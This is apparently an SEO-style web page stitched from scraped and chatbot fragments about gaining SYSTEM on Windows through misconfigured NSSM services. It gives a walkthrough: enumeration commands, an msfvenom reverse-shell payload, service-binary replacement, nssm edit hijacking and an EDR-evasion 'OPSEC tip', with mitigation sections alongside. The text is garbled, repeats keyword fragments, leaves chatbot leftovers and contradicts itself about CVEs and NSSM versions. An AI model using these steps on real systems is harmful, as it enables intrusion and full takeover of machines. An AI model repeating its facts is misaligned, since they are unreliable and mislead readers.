Nssm224 Privilege Escalation Updated Site

This guide outlines how to identify and exploit misconfigurations in the Non-Sucking Service Manager (NSSM), often referred to in contexts like "nssm224" (referring to outdated versions), to elevate privileges from a standard user to SYSTEM on Windows systems. 1. Understanding the Vulnerability

NSSM is used to run applications as Windows services. Privilege escalation occurs if the service is configured to run as LocalSystem but points to an executable or DLL that a low-privileged user can modify. Common Misconfigurations:

Unquoted Service Paths: The service path contains spaces and lacks quotes, allowing a malicious executable to be placed earlier in the path.

Weak File Permissions: The executable or its directory allows write access (W or F) for Authenticated Users or Users groups. 2. Enumeration (Finding the Target)

First, identify services managed by NSSM that run as SYSTEM and have weak permissions. Use command prompt or PowerShell: List Service Details:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" Use code with caution. Copied to clipboard

Check Permissions on Executables:Use icacls to check if your user has write access to the service binary. icacls "C:\Path\To\Service\Binary.exe" Use code with caution. Copied to clipboard

Look for (F) (Full Access) or (W) (Write Access) for the Users group. 3. Exploitation Steps (Updated Approach) Once a vulnerable service is found, follow these steps:

Create a Malicious Payload: Generate a reverse shell using msfvenom or a simple executable that adds a user to the administrators group.

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe -o service.exe Use code with caution. Copied to clipboard

Replace the Service Binary: Replace the legitimate executable with your payload.

move "C:\Path\To\Service\Binary.exe" "C:\Path\To\Service\Binary.exe.bak" copy "C:\Temp\service.exe" "C:\Path\To\Service\Binary.exe" Use code with caution. Copied to clipboard nssm224 privilege escalation updated

Restart the Service: If you have permission to restart the service, do so. If not, wait for a system reboot. sc stop sc start Use code with caution. Copied to clipboard

Obtain Shell: Catch the reverse shell as NT AUTHORITY\SYSTEM. 4. Prevention and Mitigation

Quote Service Paths: Ensure all service binary paths are enclosed in quotes to prevent unquoted service path attacks.

Restrict Permissions: Apply the principle of least privilege. Only administrators should have write access to service directories and binaries.

Update NSSM: Use the latest version of NSSM, which includes security improvements over older versions ("nssm224").

To help you further, are you analyzing a specific service? If you can share the file permissions (icacls output) or if the path is unquoted, I can tell you exactly which command to use.

The Persistent Risk of NSSM: Understanding Privilege Escalation in Service Management

The Non-Sucking Service Manager (NSSM) is a popular open-source utility used by administrators to wrap any executable into a Windows service. While it is valued for its simplicity and robustness, its role as a "service helper" has made it a frequent target for local privilege escalation (LPE) attacks. Recent updates and advisories, such as CVE-2025-41686, highlight that the vulnerability often lies not in NSSM’s core code, but in how third-party software installers deploy and configure it. The Anatomy of the Vulnerability

Privilege escalation via NSSM typically involves "Improper Permissions" (CWE-306 or CWE-639). Because Windows services often run with SYSTEM or Administrative privileges, the binaries associated with them are highly sensitive. If an installer places nssm.exe in a directory where a standard, low-privileged user has "Write" or "Modify" permissions, that user can replace the legitimate binary with a malicious one.

When the system restarts or the service is cycled, the Windows Service Control Manager (SCM) executes the attacker's malicious file instead of the original NSSM utility. Because the service was configured to run as SYSTEM, the attacker’s code inherits those maximum-level permissions, effectively granting them full control over the machine. Recent Developments and Impact

In late 2025 and early 2026, researchers identified that multiple enterprise products—including Phoenix Contact Device and Update Management and Wowza Streaming Engine—were vulnerable to this exact pattern. This guide outlines how to identify and exploit

CVE-2025-41686: A high-severity flaw (CVSS 7.8) where improper permissions on nssm.exe allowed low-privileged local attackers to gain administrative access.

CVE-2016-20033 (Updated 2026): Continued updates to older vulnerabilities in Wowza Streaming Engine showed that the "Everyone" group was still being granted full access to nssm_x64.exe in certain configurations.

These vulnerabilities are particularly dangerous because they require no user interaction. Once an attacker has gained a foothold on a system through a low-level account (e.g., via phishing or another exploit), they can use these misconfigured services to move vertically and compromise the entire infrastructure. Mitigation and Best Practices

The primary defense against NSSM-related privilege escalation is the Principle of Least Privilege. Organizations and developers should focus on the following: What Is Privilege Escalation? - Definition, Types, Examples

The Non-Sucking Service Manager ( ) version 2.24 has been identified as a vector for local privilege escalation (LPE)

in several recent security advisories, typically due to improper file system permissions on the binary within third-party installers. Phoenix Contact The "Create a Feature" Exploit Mechanism

In the context of privilege escalation, "creating a feature" refers to an attacker abusing the core functionality of NSSM—its ability to install and manage Windows services—to execute malicious code with higher-level permissions (e.g., NT AUTHORITY\SYSTEM Key exploit methods include: Binary Replacement (Service Sideloading): If the directory containing

or the service executable it wraps has weak permissions (e.g., "Everyone" has "Full Control"), an attacker can replace the legitimate binary with a malicious one. When the service restarts, the malicious code runs as a privileged service. Service Configuration Hijacking: Using the command nssm install nssm set AppParameters

, an attacker with sufficient local rights can redirect a service to execute their own scripts or payloads instead of the intended application. Interactive Shell Creation: A common technique involves setting a service type to SERVICE_INTERACTIVE_PROCESS nssm set Type SERVICE_INTERACTIVE_PROCESS . If the service runs as LocalSystem

, it can potentially allow an attacker to interact with a system-level desktop. Vulnerability Chaining: Advanced attackers, such as the Akira Ransomware group

, use NSSM 2.24 to create persistent malicious services named "sysmon" or "edge.exe" to launch tunneling tools like for remote access. National Institute of Standards and Technology (.gov) Recent Vulnerability: CVE-2025-41686 A critical flaw ( Core Problem (Pre-Update) In versions prior to 2

) was discovered in 2025 affecting various products that bundle

. It allows low-privileged local attackers to exploit improper permissions to gain full administrative access by manipulating the file and executing malicious commands. certvde.com Recommended Mitigation: Ensure that the

binary and the directories it resides in are protected by strict Access Control Lists (ACLs) , allowing only administrators write access.

Update any software bundling NSSM to the latest versions (e.g., Phoenix Contact DaUM version or later).

Monitor for unusual service creation events (Event ID 7045) or changes to service configurations. Phoenix Contact to audit the permissions of all instances on your system? CVE-2016-20033 Detail - NVD

Core Problem (Pre-Update)

In versions prior to 2.24.1 and some legacy 2.24 builds, NSSM allowed a low-privileged user (with SERVICE_CHANGE_CONFIG rights on a service they control) to launch an arbitrary executable as SYSTEM. The attack flow looked like this:

1. Enumerate writable service binaries – Find a service where the binPath points to a user-writable location.
2. Use NSSM to edit the service – Run nssm edit <servicename> and point Application to cmd.exe or a reverse shell.
3. Restart the service – The new binary executes with the service’s existing privileges (often SYSTEM or LOCAL SERVICE).

Without NSSM, an attacker would need to manually stop the service, modify registry keys (which require SYSTEM or Administrator rights), or use APIs that trigger User Account Control (UAC). NSSM bypassed many of these friction points because it relied on the ChangeServiceConfig API—which respects service DACLs—but did not check if the target binary was trustworthy.

Updated Considerations (2025+)

• Modern EDRs detect nssm.exe modifying service configs or spawning shells. OPSEC tip: Use PowerShell to directly edit registry keys instead of calling nssm.exe:

  Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\VulnService\Parameters" -Name "Application" -Value "C:\Windows\System32\cmd.exe /c malicious.bat"
  

• Group Policy often blocks non-admin users from starting/stopping services. Check sc qc [ServiceName] for START_NAME and SERVICE_START_NAME.
• NSSM 2.24 is legacy (latest is 2.24-103). No known direct CVEs for NSSM itself — the issue is misconfigured service permissions, not NSSM vulnerability.

The Bottom Line: Legacy Tools, Persistent Risks

The nssm224 privilege escalation updated keyword is not just SEO bait—it represents a real, decade-old attack vector that refuses to die. As long as administrators copy-paste outdated tutorials installing nssm without hardening, this vector will remain in Active Directory environments.

For defenders: Audit all NSSM services today, enforce quoted paths, and restrict service ACLs. For researchers: Look into NSSM’s newer 2.24.3 unofficial builds—some reintroduced insecure temporary file creation.

NSSM is still a great tool. But like any powerful utility, with great power comes great responsibility—and a potential privilege escalation path to SYSTEM.

Updated Exploitation Techniques (2025 Perspective)

Penetration testers have refined the nssm224 attack chain. Here is the modern methodology:

NSSM 2.24 – Privilege Escalation Vector

NSSM allows a user to install and manage Windows services. When a low-privilege user has write access to an NSSM-controlled service configuration or its binary path, privilege escalation becomes possible.